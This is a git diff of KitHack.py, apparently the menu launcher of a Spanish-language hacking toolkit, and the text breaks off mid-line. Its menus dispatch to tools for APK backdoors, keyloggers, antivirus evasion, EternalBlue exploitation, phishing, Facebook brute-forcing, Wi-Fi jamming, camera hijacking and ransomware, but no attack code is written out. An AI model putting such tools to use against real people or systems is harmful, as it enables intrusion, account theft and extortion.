diff --git a/KitHack.py b/KitHack.py index 7bbfc9a..27abf7c 100755 --- a/KitHack.py +++ b/KitHack.py @@ -1,4252 +1,5885 @@ #!/usr/bin/python3 # -*- coding: utf-8 -*- -#Copyright 2021 KITHACK -#Written by: Adrian Guillermo -#Facebook: https://facebook.com/adrian.guillermo.22 -#Github: https://github.com/AdrMXR - -BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = '\33[94m', '\033[91m', '\33[97m', '\033[36m', '\033[0m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m', '\033[1m' - -import sys -import os +# Copyright 2021 KITHACK +# Written by: Adrian Guillermo +# Facebook: https://facebook.com/adrian.guillermo.22 +# Github: https://github.com/AdrMXR +import os import subprocess +import sys import time -import requests import webbrowser -from sys import exit -from getch import pause -from tkinter import Tk, filedialog -from lib.banners import * -from lib import kitools -from lib.network import run_network - -def check_connection(host='https://www.google.com'): - print("{}Verificando su conexion a internet...".format(GREEN)) - time.sleep(0.5) - try: - req = requests.get(host, timeout=15) - if req.status_code == 200: - print("{}Conexion a internet exitosa.".format(GREEN)) - time.sleep(0.5) - pass - except: - print("{0}[x]:{1} Verifique su conexion a internet.".format(RED, DEFAULT)) - exit(0) - -def check_permissions(): - if os.getuid() == 0: - info() - else: - os.system('clear') - print("{0}[!]{1} ¡Permiso denegado! Recuerde ejecutar: {2}sudo {1}python3 KitHack.py".format(RED, DEFAULT, GREEN)) - exit(0) - -def info(): - os.system('clear') - print("{0}[VERSION]:{1} 1.3.2\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[AUTOR]:{1} Adrian Guillermo\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[GITHUB]:{1} https://www.github.com/AdrMXR\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[FACEBOOK]:{1} https://www.facebook.com/adrian.Guillermo.22\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[INSTAGRAM]:{1} https://www.instagram.com/adrian.guillermo22\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - print("{0}[YOUTUBE]:{1} https://www.youtube.com/channel/UCqEtxJKbIghx6lyymrjfvnA\n".format(RED, DEFAULT)) - time.sleep(2.5) - os.system('clear') - -def main(): - print(start_main_menu) - option = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - option = option.zfill(2) - - if option == '01': - os.system('clear') - print ('========={0}Tool{1}==================================={0}Information{1}================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Backdoor-apk {2}Agrega una puerta trasera a cualquier archivo APK.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Evil-Droid {2}Genera puertas traseras para Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Spade {2}Script en python que genera una puerta trasera a cualquier APK.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} AhMyth {2}Herramienta de administración remota de Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Andspoilt {2}Ejecuta exploits interactivos de Android en Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Kwetza {2}Inyecta malware en aplicaciones android existentes.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Termux {2}Emulador de terminal Android basada en Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Android-Exploits {2}Coleccion de exploits y hacks Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Grabcam {2}Permite piratear la cámara de nuestras victimas con una página falsa.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Androidpatternlock {2}Permite obtener el patrón de bloqueo en dispositivos Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.BackdoorApk() - - elif tool == '02': - kitools.EvilDroid() - - elif tool == '03': - kitools.Spade() - - elif tool == '04': - kitools.AhMyth() - - elif tool == '05': - kitools.Andspoilt() - - elif tool == '06': - kitools.Kwetza() - - elif tool == '07': - kitools.Termux() - - elif tool == '08': - kitools.AndroidExploits() - - elif tool == '09': - kitools.Grabcam() - - elif tool == '10': - kitools.AndroidPatternLock() - - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '02': - os.system('clear') - print ('========{0}Tool{1}================================================{0}Information{1}==================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} Winpayloads {2}Generador de payloads indetectables en Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} sAINT {2}Generador de spyware para sistemas Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} BeeLogger {2}Generador de Keyloggers gmail para Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} FakeImageExploiter {2}Inyecta malware en imagenes jpg para Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Koadic {2}Rootkit de Windows posterior a una explotacion.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Phantom Evasion {2}Herramienta de evasion de Antivirus.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Ps1encode {2}Generador y codificador de payloads basados en PowerShell.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} DKMC {2}Herramienta de evasion de carga maliciosa.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Cromos {2}Inyecta codigo en extensiones legitimas de Chrome Web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Eternal_scanner {2}Escáner para el exploit Eternal Blue y Eternal Romance.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} EternalblueDoublepulsar {2}Módulo de Metasploit para explotar la vulnerabilidad Eternalblue-Doublepulsar.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} EternalBlueWinXPWin10 {2}Modulo de Metasploit EternalBlue desde Windows XP SP2 hasta Windows 10 Pro.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Windows-Exploits {2}Coleccion de Exploits Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.Winpayloads() - - elif tool == '02': - kitools.sAINT() - - elif tool == '03': - kitools.BeeLogger() - - elif tool == '04': - kitools.FakeImageExploiter() - - elif tool == '05': - kitools.Koadic() - - elif tool == '06': - kitools.PhantomEvasion() - - elif tool == '07': - kitools.Ps1encode() - - elif tool == '08': - kitools.DKMC() - - elif tool == '09': - kitools.Cromos() - - elif tool == '10': - kitools.EternalScanner() - - elif tool == '11': - kitools.EternalblueDoublepulsarMetasploit() - - elif tool == '12': - kitools.MS17010EternalBlueWinXPWin10() - - elif tool == '13': - kitools.WindowsExploits() - - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '03': - os.system('clear') - print ('======={0}Tool{1}======================================={0}Information{1}====================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} HiddenEye {2}Herramienta de phishing moderna con funcionalidad avanzada.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} PhishX {2}Generador de phishing y spoofing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} SocialPhish {2}Herramienta phishing con 32 plantillas + 1 personalizable.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} SocialFish {2}Herramienta educativa de phishing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} PhisherMan {2}Herramienta phishing con 17 plantillas y funcional con ngrok.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Spectre {2}Admite ataques de phishing casi con cualquier sitio web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Blackeye {2}Herramienta de phishing con 38 sitios web disponibles.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} PhEmail {2}Automatiza procesos de envío de correos electrónicos de phishing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Weeman {2}Servidor HTTP para phishing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Zphisher {2}Herramienta de phishing automatizada.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} AIOPhish {2}Herramienta phishing con diferentes opciones.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.HiddenEye() - - elif tool == '02': - kitools.PhishX() - - elif tool == '03': - kitools.SocialPhish() - - elif tool == '04': - kitools.SocialFish() - - elif tool == '05': - kitools.PhisherMan() - - elif tool == '06': - kitools.Spectre() - - elif tool == '07': - kitools.Blackeye() - - elif tool == '08': - kitools.PhEmail() - - elif tool == '09': - kitools.Weeman() - - elif tool == '10': - kitools.Zphisher() - - elif tool == '11': - kitools.AIOPhish() - - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '04': - os.system('clear') - print ('======={0}Tool{1}====================================={0}Information{1}======================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Fluxion {2}herramienta de auditoría de redes e ingeniería social.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Wifiphisher {2}herramienta que permite capturar contraseñas wifi mediante AP.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Wifibroot {2}herramienta wifi Pentest Cracking para WPA/WPA2. '.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Wifite {2}Ejecuta herramientas de auditoría inalámbrica existentes para usted.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Ettercap {2}Interceptor/sniffer/registrador para LANs con switch.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Linset {2}Herramienta de phishing WPA/WPA2.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} WiFi-Pumpkin {2}Framework de AP para crear facilmente redes falsas.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Wifresti {2}Localiza tu contraseña de red inalámbrica en Windows, Linux y Mac OS.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Evil Limiter {2}Herramienta que limita el ancho de banda de los dispositivos.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Netool-toolkit {2}Kit de herramientas de código abierto de pentesting de MitM.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Dracnmap {2}Herramienta que se utiliza para explotar redes y recopilar datos con nmap.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Airgeddon {2}Script en bash para auditar redes inalambricas.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Routersploit {2}Se compone de varios módulos que ayudan a operar pruebas de penetracion.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} Eaphammer {2}Kit para realizar ataques dirigidos contra redes WPA2-Enterprise.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} VMR-MDK {2}Script para descifrar redes inalámbricas WPS.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} Wirespy {2}Permite configurar honeypots rápidos para llevar a cabo MITMA.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} Wireshark {2}Analizador de redes que te permite capturar y navegar en el trafico de una red.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} SniffAir {2}Framework para pentesting inalámbrico.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} WifiJammer {2}Atasca continuamente todos los clientes/enrutadores wifi.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} KawaiiDeauther {2}Bloquea todos los clientes/enrutadores wifi.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.Fluxion() - - elif tool == '02': - kitools.Wifiphisher() - - elif tool == '03': - kitools.Wifibroot() - - elif tool == '04': - kitools.Wifite() - - elif tool == '05': - kitools.Ettercap() - - elif tool == '06': - kitools.Linset() - - elif tool == '07': - kitools.WiFiPumpkin() - - elif tool == '08': - kitools.Wifresti() - - elif tool == '09': - kitools.EvilLimiter() - - elif tool == '10': - kitools.NetoolToolkit() - - elif tool == '11': - kitools.Dracnmap() - - elif tool == '12': - kitools.Airgeddon() - - elif tool == '13': - kitools.Routersploit() - - elif tool == '14': - kitools.Eaphammer() - - elif tool == '15': - kitools.VMRMDK() - - elif tool == '16': - kitools.Wirespy() - - elif tool == '17': - kitools.Wireshark() - - elif tool == '18': - kitools.SniffAir() - - elif tool == '19': - kitools.WifiJammer() - - elif tool == '20': - kitools.KawaiiDeauther() - - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '05': - os.system('clear') - print ('======={0}Tool{1}====================================={0}Information{1}================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Cupp {2}Permite crear diccionarios específicamente para una persona.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Facebooker {2}Script en perl que realiza fuerza bruta contra Facebook.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} BluForce-FB {2}Ataques de fuerza bruta en cuentas de Facebook.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Brut3k1t {2}Ataques de fuerza bruta contra una multitud de protocolos y servicios.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} SocialBox {2}Framework de fuerza bruta [Facebook, Gmail, Instagram, Twitter].'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} John The Ripper {2}Programa que aplica fuerza bruta para descifrar contraseñas.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Hashcat {2}Herramienta para la recuperación de contraseñas.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Brutedum {2}Ataca SSH, FTP, Telnet, PostgreSQL, RDP, VNC con Hydra, Medusa y Ncrack.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Facebash {2}Ataque de fuerza bruta para facebook en shellscript usando TOR.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Brutespray {2}Automatiza el escaneo de puertos y realiza ataques por fuerza bruta.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Pupi {2}Pupi es un generador de contraseñas simple a partir de información personal.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} B4r-brute {2}Script para crackear cuentas de Facebook usando la ID del usuario.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Fb-Hack {2}Script de recuperación y pirateo de contraseña de Facebook.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.Cupp() - - elif tool == '02': - kitools.Facebooker() - - elif tool == '03': - kitools.BluForceFB() - - elif tool == '04': - kitools.Brut3k1t() +from sys import exit +from tkinter import filedialog +from tkinter import Tk - elif tool == '05': - kitools.SocialBox() +import requests +from getch import pause - elif tool == '06': - kitools.JohnTheRipper() +from lib import kitools +from lib.banners import * +from lib.network import run_network - elif tool == '07': - kitools.Hashcat() +BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = ( + "\33[94m", + "\033[91m", + "\33[97m", + "\033[36m", + "\033[0m", + "\33[93m", + "\033[1;35m", + "\033[1;32m", + "\033[0m", + "\033[1m", +) + + +def check_connection(host="https://www.google.com"): + print("{}Verificando su conexion a internet...".format(GREEN)) + time.sleep(0.5) + try: + req = requests.get(host, timeout=15) + if req.status_code == 200: + print("{}Conexion a internet exitosa.".format(GREEN)) + time.sleep(0.5) + pass + except: + print("{0}[x]:{1} Verifique su conexion a internet.".format( + RED, DEFAULT)) + exit(0) - elif tool == '08': - kitools.Brutedum() - elif tool == '09': - kitools.Facebash() +def check_permissions(): + if os.getuid() == 0: + info() + else: + os.system("clear") + print( + "{0}[!]{1} ¡Permiso denegado! Recuerde ejecutar: {2}sudo {1}python3 KitHack.py" + .format(RED, DEFAULT, GREEN)) + exit(0) - elif tool == '10': - kitools.Brutespray() - elif tool == '11': - kitools.Pupi() - - elif tool == '12': - kitools.B4rbrute() - - elif tool == '13': - kitools.FbHack() - - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '06': - os.system('clear') - print ('======={0}Tool{1}========================================={0}Information{1}========================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} SQLmap {2}Inyección SQL y toma de control de los servidores de bases de datos.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} XAttacker {2}Escáner de vulnerabilidades de sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Fuxploider {2}Detecta técnicas favorables para cargar shells web o cualquier archivo malicioso.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Wordpresscan {2}Escáner de WordPress de vulnerabilidades.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} SiteBroker {2}Recopila información y automatiza pruebas de penetración en sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} NoSQLMap {2}Explotacion de debilidades de configuración predeterminadas en bases de datos NoSQL.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Sqli-scanner {2}Escanear de sitios web vulnerables a la inyección de SQL destinado a una lista de URL.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Joomscan {2}Permite escanear sitios web y detectar configuraciones erroneas o deficiencias.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Metagoofil {2}Extractor de metadatos de documentos públicos (pdf, doc, xls, ppt, etc.).'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Sublist3r {2}Herramienta rápida de enumeración de subdominios para probadores de penetración.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} WAFNinja {2}Programa que contiene dos funciones para atacar firewalls de aplicaciones web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Dirsearch {2}Diseñada para directorios y archivos de fuerza bruta en sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} XSStrike {2}El escáner XSS más avanzado.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} LinksF1nd3r {2}Extractor de componentes web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} D-TECT {2}Herramienta moderna para realizar pentesting en sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} Phpsploit {2}Herramienta capaz de mantener el acceso a un servidor web comprometido.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.SQLmap() - - elif tool == '02': - kitools.XAttacker() - - elif tool == '03': - kitools.Fuxploider() - - elif tool == '04': - kitools.Wordpresscan() - - elif tool == '05': - kitools.SiteBroker() - - elif tool == '06': - kitools.NoSQLMap() - - elif tool == '07': - kitools.SqliScanner() - - elif tool == '08': - kitools.Joomscan() - - elif tool == '09': - kitools.Metagoofil() - - elif tool == '10': - kitools.Sublist3r() - - elif tool == '11': - kitools.WAFNinja() - - elif tool == '12': - kitools.Dirsearch() - - elif tool == '13': - kitools.XSStrike() - - elif tool == '14': - kitools.LinksF1nd3r() - - elif tool == '15': - kitools.DTECH() - - elif tool == '16': - kitools.Phpsploit() - - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '07': - os.system('clear') - print ('======={0}Tool{1}====================================={0}Information{1}=================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} SpoofMAC {2}Permite modificar su direccion MAC para depurar.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Ip_spoofing {2}ARP spoofing, HTTP spoofing && Dos.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Arpspoof {2}Ataque de falsificación de ARP utilizando sockets del kernel de Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} DerpNSpoof {2}Herramienta de suplantación de DNS simple.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} DrSpoof {2}Herramienta para detectar y detener ataques ARP Spoofing en su red local.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} GODKILLER {2}SMS-BOMBER y SMS-SENDER.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.SpoofMAC() - - elif tool == '02': - kitools.IpSpoofing() - - elif tool == '03': - kitools.Arpspoof() - - elif tool == '04': - kitools.DerpNSpoof() - - elif tool == '05': - kitools.DrSpoof() - - elif tool == '06': - kitools.GODKILLER() +def info(): + os.system("clear") + print("{0}[VERSION]:{1} 1.3.2\n\n".format(RED, DEFAULT)) + time.sleep(0.5) + print("{0}[AUTOR]:{1} Adrian Guillermo\n\n".format(RED, DEFAULT)) + time.sleep(0.5) + print("{0}[GITHUB]:{1} https://www.github.com/AdrMXR\n\n".format( + RED, DEFAULT)) + time.sleep(0.5) + print("{0}[FACEBOOK]:{1} https://www.facebook.com/adrian.Guillermo.22\n\n". + format(RED, DEFAULT)) + time.sleep(0.5) + print( + "{0}[INSTAGRAM]:{1} https://www.instagram.com/adrian.guillermo22\n\n". + format(RED, DEFAULT)) + time.sleep(0.5) + print( + "{0}[YOUTUBE]:{1} https://www.youtube.com/channel/UCqEtxJKbIghx6lyymrjfvnA\n" + .format(RED, DEFAULT)) + time.sleep(2.5) + os.system("clear") - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - elif option == '08': - os.system('clear') - print ('========={0}Tool{1}========================================{0}Information{1}========================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} NMAP {2}Obtiene información de los host, puertos y servicios dentro de una red.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Th3inspector {2}Herramienta todo en uno para recopilar información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} FBI {2}Recopilación de información confidencial en cuentas de Facebook.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Infoga {2}Extrae información de cuentas de correo electrónico.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Crips {2}Obtiene información sobre direcciones IP, paginas web y registros DNS.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} BillCipher {2}Recopilación de información para un sitio web o direccion IP.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} RED_HAWK {2}Herramienta para recopilar información, escanear vulnerabilidades y rastreo.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Recon-ng {2}Herramienta precargada con gran cantidad de modulos para recopilar información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} theHarvester {2}Recopilación de correos electrónicos, nombres, subdominios, direcciones IP y URL.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} PhoneInfoga {2}Obtiene información sobre numeros de telefono utilizando recursos gratuitos.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Gasmask {2}Herramienta de recopilación de información todo en uno.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} URLextractor {2}Recopilación de información y reconocimiento de sitios web.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Devploit {2}Busqueda de DNS, Whois, IP, GeoIP, subred, puertos, host, etc.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} ReconDog {2}Herramienta todo en uno para recopilar información básica.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} Webkiller {2}Kit de recopilación de información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} Quasar {2}Framework de recopilación de información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} Info-instagram {2}Permite extraer información de cuentas de instagram.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} UserScan {2}Scanner de indentidad con el que podras buscar cuentas que tengan un username.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} XCTR-Hacking {2}Herramientas todo en uno para la recopilación de información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} DeadTrap {2}Herramienta OSINT para rastrear huellas de un número de teléfono.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.NMAP() - - elif tool == '02': - kitools.Th3inspector() - - elif tool == '03': - kitools.FBI() - - elif tool == '04': - kitools.Infoga() - - elif tool == '05': - kitools.Crips() - - elif tool == '06': - kitools.BillCipher() - - elif tool == '07': - kitools.RedHawk() - - elif tool == '08': - kitools.ReconNg() - - elif tool == '09': - kitools.theHarvester() - - elif tool == '10': - kitools.PhoneInfoga() - - elif tool == '11': - kitools.Gasmask() - - elif tool == '12': - kitools.URLextractor() - - elif tool == '13': - kitools.Devploit() - - elif tool == '14': - kitools.ReconDog() - - elif tool == '15': - kitools.Webkiller() - - elif tool == '16': - kitools.Quasar() - - elif tool == '17': - kitools.InfoInstagramIphone() - - elif tool == '18': - kitools.UserScan() - - elif tool == '19': - kitools.XCTRHackingTools() - - elif tool == '20': - kitools.DeadTrap() - - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '09': - os.system('clear') - print ('======{0}Tool{1}===================================================={0}Information{1}======================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} TheFatRat {2}Herramienta que compila malware para ejecutar en Linux, Windows, Mac y Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Msfpc {2}Contenedor para generar múltiples cargas útiles, según la elección de los usuarios.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Fcrackzip {2}Script para descifrar archivos ZIP encriptados por contraseña.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} QRLjacker {2}Vector de ataque capaz de secuestrar sesiones que dependen de algun codigo QR.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Lazy {2}Script que automatiza muchos procesos de penetracion.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} HTBINVITE {2}Generador de codigos de invitacion para HackTheBox.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Ngrok {2}Proxy inverso que crea un túnel seguro desde un punto público a un servicio local.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Bluepot {2}Honeypot Bluetooth escrito en Java.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Setoolkit {2}Marco de prueba de penetración de código abierto diseñado para la ingeniería social.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} A2sv {2}Vulnerabilidad de escaneo automático a SSL.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} 4nonimizer {2}Anonimiza la IP pública utilizada para navegar por Internet mediante proveedores VPN.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Easysploit {2}Automatización de Metasploit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} NXcrypt {2}Inyección de malware en archivos con formato python.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} KnockMail {2}Verifica si existe un correo electronico'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} RkHunter {2}Herramienta de Unix que detecta los rootkits, puertas traseras y exploits locales.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} ZLogger {2}Keylogger remoto persistente para Windows y Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} Xerosploit {2}Kit de herramientas de pruebas de penetración.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} Slacksec {2}Kit basico de herramientas hacking.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} Katana-Framework {2}Unifica distintas herramientas funcionales para pruebas de penetración.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}21){1} Z0172CK-Tools {2}Hacking Tools Z0172CK.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}22){1} Cam-Hack {2}Método avanzado para piratear la cámara de un móvil o una PC con un enlace.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}23){1} Onex {2}Biblioteca de herramientas para hackers.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}24){1} Ransom0 {2}Ransomware diseñado para buscar y cifrar datos de usuarios.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}25){1} Morpheus 